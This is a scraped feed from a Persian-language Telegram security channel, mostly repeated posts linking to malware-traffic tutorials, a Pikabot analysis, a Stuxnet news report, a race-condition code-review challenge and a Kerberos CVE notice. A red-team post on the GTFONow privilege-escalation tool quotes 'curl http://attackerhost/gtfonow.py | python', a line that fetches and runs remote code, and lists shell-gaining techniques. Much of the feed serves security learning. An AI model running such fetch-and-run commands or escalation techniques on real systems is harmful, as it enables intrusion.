⭕️یک نیروی نفوذی سازمان اطلاعات هلند بنام اریک، عامل منتشر کننده ویروس خرابکار استاکسنت در سال ۲۰۰۷ بوده ، ویروسی که خرابکاری زیادی در راکتور های هسته ای ایران به وجود آورد.
https://nos.nl/artikel/2504114-nederlander-saboteerde-atoomcomplex-in-iran-den-haag-wist-niets
#stuxnet
@Engineer_Computer
https://nos.nl/artikel/2504114-nederlander-saboteerde-atoomcomplex-in-iran-den-haag-wist-niets
#stuxnet
@Engineer_Computer
nos.nl
‘Nederlander saboteerde atoomcomplex in Iran, Den Haag wist niets’
De sabotageactie vond plaats in 2007. De AIVD-infiltrant is kort na de operatie overleden door een motorongeluk, schrijft de Volkskrant.
آزمایشگاه
تحلیل ترافیک HTTPS
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/
تحلیل ترافیک HTTPS
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/
Unit 42
Wireshark Tutorial: Decrypting HTTPS Traffic
This short Wireshark tutorial explains decrypting HTTPS traffic, including when you can accomplish it and how to do it.
تحلیل ترافیک Trickbot
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/
Unit 42
Wireshark Tutorial: Examining Trickbot Infections
A tutorial offering tips on how to identify Trickbot, an information stealer and banking malware that has been infecting victims since 2016.
تحلیل بدافزار بانکی
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/
Unit 42
Wireshark Tutorial: Examining Ursnif Infections
Ursnif is banking malware sometimes referred to as Gozi or IFSB. The Ursnif family of malware has been active for years, and current samples generate distinct traffic patterns.This tutorial reviews packet captures (pcaps) of infection Ursnif traffic using…
و اینهم یو تحلیل دیگر از فعالیت های بدافزاری
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/
@Engineer_Computer
https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/
Unit 42
Wireshark Tutorial: Examining Ursnif Infections
Ursnif is banking malware sometimes referred to as Gozi or IFSB. The Ursnif family of malware has been active for years, and current samples generate distinct traffic patterns.This tutorial reviews packet captures (pcaps) of infection Ursnif traffic using…
تحلیل بد افزار
How Pikabot obfuscates and decrypts strings.
How Pikabot retrieves API addresses.
How Pikabot slows down the analysis process.
How Pikabot generates victim uuid.
Collecting information from the victim’s machine.
How Pikabot decrypts C2 addresses.
How Pikabot utilizes Syscall.
@Engineer_Computer
https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/
How Pikabot obfuscates and decrypts strings.
How Pikabot retrieves API addresses.
How Pikabot slows down the analysis process.
How Pikabot generates victim uuid.
Collecting information from the victim’s machine.
How Pikabot decrypts C2 addresses.
How Pikabot utilizes Syscall.
@Engineer_Computer
https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/
0day in {REA_TEAM}
[QuickNote] Technical Analysis of recent Pikabot Core Module
1. Overview In early February 2023, cybersecurity experts on Twitter issued a warning about a new malware variant/family being distributed by the #TA577 botnet (associated with the same group from …
Network Security Channel
تحلیل بد افزار How Pikabot obfuscates and decrypts strings. How Pikabot retrieves API addresses. How Pikabot slows down the analysis process. How Pikabot generates victim uuid. Collecting information from the victim’s machine. How Pikabot decrypts C2…
کتابهای پیشنهادی در مسیر انجام تحلیل بدافزار
https://blog.securitybreak.io/my-top-books-to-learn-malware-analysis-and-reverse-engineering-2ae1c6e209b9
@Engineer_Computer
https://blog.securitybreak.io/my-top-books-to-learn-malware-analysis-and-reverse-engineering-2ae1c6e209b9
@Engineer_Computer
Medium
My Top Books to Learn Malware Analysis and Reverse Engineering
I often get messages from people wanting to learn more about reverse engineering and malware. I always refer to the same books and I though…
ترجمه کامل مقاله روزنامه هلندی
درخصوص اولین مرحله از حضور اکستاکس نت در ایران
@Engineer_Computer
https://onhexgroup.ir/stuxnet-erik-van-sabben/
درخصوص اولین مرحله از حضور اکستاکس نت در ایران
@Engineer_Computer
https://onhexgroup.ir/stuxnet-erik-van-sabben/
ONHEXGROUP
ابعاد جدیدی از ویروس استاکس نت منتشر شد
در این پست گزارش روزنامه ی هلندی Volkskrant در خصوص نحوه ی ورود ویروس استاکس نت به تاسیسات هسته ای ایران ، توسط یه مهندس هلندی رو بررسی کردیم.
rapid7 BLOG
InsightAppSec Advanced Authentication Settings: Token Replacement
Link : https://www.rapid7.com/blog/post/2023/08/01/insightappsec-advanced-authentication-settings-token-replacement/
Patch Tuesday - August 2023
Link: https://www.rapid7.com/blog/post/2023/08/08/patch-tuesday-august-2023/
Metasploit weekly wrap-up Aug 11, 2023
Link : https://www.rapid7.com/blog/post/2023/08/11/metasploit-weekly-wrapup-8/
@Engineer_Computer
InsightAppSec Advanced Authentication Settings: Token Replacement
Link : https://www.rapid7.com/blog/post/2023/08/01/insightappsec-advanced-authentication-settings-token-replacement/
Patch Tuesday - August 2023
Link: https://www.rapid7.com/blog/post/2023/08/08/patch-tuesday-august-2023/
Metasploit weekly wrap-up Aug 11, 2023
Link : https://www.rapid7.com/blog/post/2023/08/11/metasploit-weekly-wrapup-8/
@Engineer_Computer
یک رایت آپ برای کشف Dependency Confusion روی تارگت های مختلف. اگه این باگ رو پیدا کردید حتما اکسپلویتش کنید صرفا پیدا کردن دیپندسی بدرد نمیخوره و ریپورتتون ریجکت میشه. در حدی که نشون بدید یک درخواست به سرورتون زده میشه کافیه.
https://medium.com/@jeetpal2007/easiest-way-to-find-rce-package-dependency-25aa9cf47dcb
@Engineer_Computer
https://medium.com/@jeetpal2007/easiest-way-to-find-rce-package-dependency-25aa9cf47dcb
@Engineer_Computer
Medium
Easiest way to Find RCE (Package Dependency)
Hello
Secure Coding + Code Review Challenge
تو چالش بالا، آسیب پذیری قطعه کد رو پیدا کنید. کدی بنویسید که از اسیب پذیری جلوگیری کنه و یک Semgrep Rule یا CodeQL Query بنویسید که توی کدبیس های مختلف قابل شناسایی باشه.
@Engineer_Computer
تو چالش بالا، آسیب پذیری قطعه کد رو پیدا کنید. کدی بنویسید که از اسیب پذیری جلوگیری کنه و یک Semgrep Rule یا CodeQL Query بنویسید که توی کدبیس های مختلف قابل شناسایی باشه.
@Engineer_Computer
Network Security Channel
Secure Coding + Code Review Challenge تو چالش بالا، آسیب پذیری قطعه کد رو پیدا کنید. کدی بنویسید که از اسیب پذیری جلوگیری کنه و یک Semgrep Rule یا CodeQL Query بنویسید که توی کدبیس های مختلف قابل شناسایی باشه. @Engineer_Computer
جواب چالش:
آسیب پذیری که مورد نظر بود، Race Condition بود. در این کلاس در داخل متد add، یک race window داریم که اگه چندین درخواست همزمان بفرستیم باعث ایجاد contact های بیشتر از حد مجاز میشه. پترن check-to-act داخل کد قابل مشاهده هست. برای فیکسش باید در critical section لاک در نظر بگیریم که اینجا از asynx-mutex استفاده شده.
اگه از semgrep برای نوشتن رول بخواید استفاده کنید باید در کنار شناسایی پترن، کد رو هم review کنید تا ببینید واقعا race میخوره یا نه. پترنی که باید نوشته شه باید داخل چند مورد رو چک کنیم: داخل کلاس، داخل تابع معمولی، داخل arrow function که در روترها معمولا استفاده میشه. در داخل بلاک ها اگه یک شرطی بررسی بشه و در ادامه یک عملیات async داشته باشیم میتونه منجر به این آسیب پذیری بشه که برای اطمینان باید چک کنیم.
@Engineer_Computer
آسیب پذیری که مورد نظر بود، Race Condition بود. در این کلاس در داخل متد add، یک race window داریم که اگه چندین درخواست همزمان بفرستیم باعث ایجاد contact های بیشتر از حد مجاز میشه. پترن check-to-act داخل کد قابل مشاهده هست. برای فیکسش باید در critical section لاک در نظر بگیریم که اینجا از asynx-mutex استفاده شده.
اگه از semgrep برای نوشتن رول بخواید استفاده کنید باید در کنار شناسایی پترن، کد رو هم review کنید تا ببینید واقعا race میخوره یا نه. پترنی که باید نوشته شه باید داخل چند مورد رو چک کنیم: داخل کلاس، داخل تابع معمولی، داخل arrow function که در روترها معمولا استفاده میشه. در داخل بلاک ها اگه یک شرطی بررسی بشه و در ادامه یک عملیات async داشته باشیم میتونه منجر به این آسیب پذیری بشه که برای اطمینان باید چک کنیم.
@Engineer_Computer
⭕️ اسکریپتی توسعه داده شده است که از ابزارهای توسعه داده قبلی مانند EDRSilencer و FireBlock بهره برده است. هدف اصلی این اسکریپت، شناسایی فایل های اجرایی مختلف است که با استفاده از پلتفرم فیلترینگ ویندوز (WFP) غیر فعال شده اند. برای دستیابی به این هدف، از ماژول NtObjectManager در اسکریپت استفاده شده است.
#RedTeam #Evasion
@Engineer_Computer
Detection approach
There is no native way to list and interact with WFP. To do that we need to use the NtObjectManager module.
With the help of NtObjectManager we will be able to list all filters and the approach will be:
Create a list with the executables you want to check
Listed filters that block connections
Filter that list by the executables provided
#RedTeam #Evasion
@Engineer_Computer
GitHub
GitHub - amjcyber/EDRNoiseMaker: Detect WFP filters blocking EDR communications
Detect WFP filters blocking EDR communications. Contribute to amjcyber/EDRNoiseMaker development by creating an account on GitHub.
⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دستهبندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.
#RedTeam #Privesc #bypass
@Engineer_Computer
Features
Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python
#RedTeam #Privesc #bypass
@Engineer_Computer
GitHub
GitHub - Frissi0n/GTFONow: Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins. - Frissi0n/GTFONow
🔸برنامه سبک ساده و سریع پروکسی ساکس برای ترمینال و برنامههای ترمینالی
🔹بدون نیاز به سرویس
♦️برای اتصال به نکوری:
خط آخر پورت را به 2080 تغییر دهید.
شیوهی کار:
لینکها:
👉🔗 Github
👉🔗 Arch Extra Repo
👉🔗 Wiki
#نکته #لینوکس #معرفی #آموزش
@Engineer_Computer
🔹بدون نیاز به سرویس
♦️برای اتصال به نکوری:
sudo vi /etc/proxychains.conf
خط آخر پورت را به 2080 تغییر دهید.
socks4 127.0.0.1 2080
شیوهی کار:
proxychains COMMAND
لینکها:
👉🔗 Github
👉🔗 Arch Extra Repo
👉🔗 Wiki
#نکته #لینوکس #معرفی #آموزش
@Engineer_Computer
GitHub
GitHub - rofl0r/proxychains-ng: proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked…
proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained p...
آسیب پذیری خطرناک در ویندوز
وصله کنید
@Engineer_Computer
a Windows Kerberos security feature bypass vulnerability that allows attackers to bypass authentication mechanisms and launch impersonation attacks. Attackers can exploit this flaw via a machine-in-the-middle (MitM) attack.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674
وصله کنید
@Engineer_Computer
a Windows Kerberos security feature bypass vulnerability that allows attackers to bypass authentication mechanisms and launch impersonation attacks. Attackers can exploit this flaw via a machine-in-the-middle (MitM) attack.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674
اینطور هست که اطلاعات حساس از برنامه های اندروئید بیرون کشیده میشوند
@Engineer_Computer
https://github.com/effortlessdevsec/ApkRecon
@Engineer_Computer
https://github.com/effortlessdevsec/ApkRecon
GitHub
GitHub - effortlessdevsec/ApkRecon: Scanning APK file for URIs, endpoints & secrets.
Scanning APK file for URIs, endpoints & secrets. Contribute to effortlessdevsec/ApkRecon development by creating an account on GitHub.
تمرین
مدیریت حادثه با پاورشل
با یک ویروس نمونه
@Engineer_Computer
https://www.securityinbits.com/incident-response/powershell-commands-for-incident-response/
مدیریت حادثه با پاورشل
با یک ویروس نمونه
@Engineer_Computer
https://www.securityinbits.com/incident-response/powershell-commands-for-incident-response/
Securityinbits
PowerShell Commands for Incident Response - Securityinbits
We will learn different PowerShell Commands can be used in Incident Response to remediate the machine. I will take a scenario where a machine is infected with NanoCore malware to explain this PowerShell Commands.
Pentesting Checklist.pdf
1001.3 KB
Pentesting Checklist
@Engineer_Computer
@Engineer_Computer